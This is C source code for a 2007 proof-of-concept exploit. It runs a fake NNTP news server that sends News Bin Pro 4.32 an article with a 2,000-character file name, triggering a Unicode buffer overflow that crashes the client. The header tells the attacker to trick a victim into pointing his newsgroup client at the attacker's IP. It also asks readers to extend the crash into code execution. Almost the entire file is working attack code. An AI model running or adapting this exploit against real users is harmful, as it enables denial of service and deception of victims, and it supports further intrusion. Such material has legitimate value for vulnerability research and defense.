
# Title : News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit
# Published : 2007-03-12
# Author : Marsu


/********************************************************************************
*      News Bin Pro 4.32 Article Grabbing Remote Unicode Buffer Overflow        *
*                                                                               *
*                                                                               *
* There is a remote buffer overflow in News Bin Pro 4.32 that can be triggered  *
* by grabbing articles that contain an overly long file name.                   *
*                                                                               *
* To exploit, convince someone to set his newsgroup server to your ip:119 and   *
* ask him to download an article and to bypass filters.                         *
*                                                                               *
* This is just a DoS. I couldn't make EIP point to some interesting place. This *
* is a Unicode buffer overflow and we can force EIP to point to 0x00410041. But *
* there's no good call esp in those places. However if we can set EIP to        *
* 0x41004100 the problem is solved. Tell me if you go further.                  *
* Have Fun!                                                                     *
*                                                                               *
* Tested against WIN XP SP2 FR                                                  *
* Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "time.h"
#pragma comment(lib, "ws2_32.lib")


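/* Sizes and protocol constants used by the fake NNTP server. */
enum {
	NNTP_PORT     = 119,
	RECV_BUF_SIZE = 1024,
	EVIL_BUF_SIZE = 10000,
	NAME_PAD_LEN  = 2000   /* length of the over-long yEnc "name=" value that triggers the overflow */
};

/*
 * Send the whole NUL-terminated string msg on socket s.
 * Returns 0 when every byte was sent, -1 on a send() error or a closed peer.
 */
static int send_str(SOCKET s, const char *msg)
{
	size_t len = strlen(msg);
	size_t off = 0;

	while (off < len) {
		int n = send(s, msg + off, (int)(len - off), 0);
		if (n == SOCKET_ERROR || n <= 0)
			return -1;
		off += (size_t)n;
	}
	return 0;
}

/*
 * Receive one chunk from s into buf (cap bytes) and always NUL-terminate it,
 * so the caller can safely use strstr()/printf() on the result.
 * Returns the byte count (>0), 0 on orderly close, -1 on error.
 */
static int recv_chunk(SOCKET s, char *buf, size_t cap)
{
	int n;

	if (cap == 0)
		return -1;
	memset(buf, 0, cap);
	n = recv(s, buf, (int)(cap - 1), 0);   /* keep one byte for the terminator */
	if (n == SOCKET_ERROR)
		return -1;
	buf[n > 0 ? n : 0] = '\0';
	return n;
}

/*
 * Read the client's next NNTP command into buf and echo it to the console.
 * Returns the byte count (>0); <=0 means the client closed the connection or
 * recv() failed, in which case the dialogue cannot continue.
 */
static int read_cmd(SOCKET s, char *buf, size_t cap)
{
	int n = recv_chunk(s, buf, cap);

	if (n <= 0)
		printf("[-] Client went away before the dialogue finished\n");
	else
		printf("-> %s\n", buf);
	return n;
}

/*
 * Fake NNTP server: waits for News Bin Pro on port 119, walks it through the
 * (optional) AUTHINFO, MODE READER and GROUP exchange, then answers the ARTICLE
 * command with a yEnc-encoded article whose "name=" value is 2000 'A's.
 * The client widens the name to UTF-16, which is why EIP ends up at 0x00410041.
 * Returns 0 after the payload was sent, -1 on any socket error.
 */
int main(int argc, char* argv[])
{
	char recvbuff[RECV_BUF_SIZE];
	char postname[RECV_BUF_SIZE];   /* argument of the client's ARTICLE command */
	char evilbuff[EVIL_BUF_SIZE];
	struct sockaddr_in sin;
	SOCKET server = INVALID_SOCKET;
	SOCKET client = INVALID_SOCKET;
	WSADATA wsaData;
	const char *arg;
	size_t off, total;
	int rc = -1;

	/* Status line prefix: "220 <n> <message-id> article" per the NNTP ARTICLE reply. */
	static const char header[] = "220 0 ";

	/* Article headers plus the start of the yEnc header; the over-long file name follows. */
	static const char header2[] =
		" article\r\n"
		"Path: news.giganews.com.POSTED!not-for-mail\r\n"
		"NNTP-Posting-Date: Thu, 01 Mar 2007 11:25:26 -0600\r\n"
		"Lines: 5\r\n"
		"X-Postfilter: 1.3.34\r\n"
		"Xref:news.giganews.com alt.binaries.blabla:123456789\r\n\r\n\r\n"
		"=ybegin part=1 line=128 size=127 name=";

	/* Rest of the yEnc body and the ".\r\n" that terminates the multi-line reply. */
	static const char header3[] =
		"\r\n"
		"=ypart begin=1 end=127\r\n"
		"blablabla\r\n"
		"=yend size=127 part=1 pcrc32=d4f19f0f\r\n"
		".\r\n";

	(void)argc;
	(void)argv;

	if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
		printf("[-] WSAStartup failed\n");
		return -1;
	}

	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (server == INVALID_SOCKET) {
		printf("[-] socket() failed (%d)\n", WSAGetLastError());
		goto out;
	}

	memset(&sin, 0, sizeof sin);   /* sin_zero must not be left uninitialised */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	sin.sin_port = htons(NNTP_PORT);
	if (bind(server, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
		printf("[-] bind() on port %d failed (%d) - is another NNTP server running?\n",
		       NNTP_PORT, WSAGetLastError());
		goto out;
	}

	printf("[+] News Bin Pro 4.32 ARTICLE cmd Remote Unicode Buffer Overflow\n");
	printf("[+] Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	printf("[*] Listening on port %d...\n", NNTP_PORT);
	if (listen(server, 5) == SOCKET_ERROR) {
		printf("[-] listen() failed (%d)\n", WSAGetLastError());
		goto out;
	}
	printf("[*] Waiting for client...\n");
	printf("[+] Once connected, ask him to download and bypass filter a post\n");

	client = accept(server, NULL, NULL);
	if (client == INVALID_SOCKET) {
		printf("[-] accept() failed (%d)\n", WSAGetLastError());
		goto out;
	}
	printf("[+] Client connected\n");

	if (send_str(client, "200 Hello there\r\n") < 0) {
		printf("[-] Error in send!\n");
		goto out;
	}

	/* First command: MODE READER, ARTICLE, or AUTHINFO USER when the client authenticates. */
	if (read_cmd(client, recvbuff, sizeof recvbuff) <= 0)
		goto out;
	if (strstr(recvbuff, "AUTHINFO")) {
		if (send_str(client, "381 Pass please?\r\n") < 0)
			goto out;

		/* AUTHINFO PASS */
		if (read_cmd(client, recvbuff, sizeof recvbuff) <= 0)
			goto out;
		if (send_str(client, "281 Pleased to meet you\r\n") < 0)
			goto out;

		/* MODE READER */
		if (read_cmd(client, recvbuff, sizeof recvbuff) <= 0)
			goto out;
	}

	if (send_str(client, "200 \r\n") < 0)
		goto out;

	/* GROUP */
	if (read_cmd(client, recvbuff, sizeof recvbuff) <= 0)
		goto out;
	if (send_str(client, "211 935430 87608194 88543623 alt.binaries.blabla\r\n") < 0)
		goto out;

	/* ARTICLE <id> */
	if (read_cmd(client, recvbuff, sizeof recvbuff) <= 0)
		goto out;

	postname[0] = '\0';
	arg = strstr(recvbuff, "ARTICLE");
	if (arg == NULL) {
		printf("[-] ARTICLE were expected. Exploit will fail.\n");
	} else {
		/* Take the argument after the keyword, without the trailing CRLF,
		 * so the 220 status line we echo it into stays a single line. */
		size_t len;
		arg += strlen("ARTICLE");
		while (*arg == ' ')
			arg++;
		len = strcspn(arg, "\r\n");
		memcpy(postname, arg, len);   /* fits: recvbuff and postname have the same size */
		postname[len] = '\0';
		printf("[+] Using %s to build evil data.\n", postname);
	}

	/* Assemble: header + postname + header2 + NAME_PAD_LEN x 'A' + header3.
	 * The buffer is pre-filled with 'A', so the over-long name is already in place. */
	total = strlen(header) + strlen(postname) + strlen(header2) + NAME_PAD_LEN + strlen(header3);
	if (total > sizeof evilbuff) {
		printf("[-] Payload does not fit in %d bytes\n", EVIL_BUF_SIZE);
		goto out;
	}
	memset(evilbuff, 'A', sizeof evilbuff);
	off = 0;
	memcpy(evilbuff + off, header, strlen(header));
	off += strlen(header);
	memcpy(evilbuff + off, postname, strlen(postname));
	off += strlen(postname);
	memcpy(evilbuff + off, header2, strlen(header2));
	off += strlen(header2);
	off += NAME_PAD_LEN;
	memcpy(evilbuff + off, header3, strlen(header3));
	off += strlen(header3);

	/* Send exactly the assembled article; the buffer is not NUL-terminated,
	 * so its length must be tracked explicitly rather than taken from strlen(). */
	if (send(client, evilbuff, (int)off, 0) == SOCKET_ERROR) {
		printf("[-] Error in send!\n");
		goto out;
	}

	printf("[+] Evil data sent. EIP should have become 0x00410041 \n    Tell me if you can go further =)\n");
	Sleep(500);   /* give the client a moment to read the payload before we close the socket */
	rc = 0;

out:
	if (client != INVALID_SOCKET)
		closesocket(client);
	if (server != INVALID_SOCKET)
		closesocket(server);
	WSACleanup();
	return rc;
}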
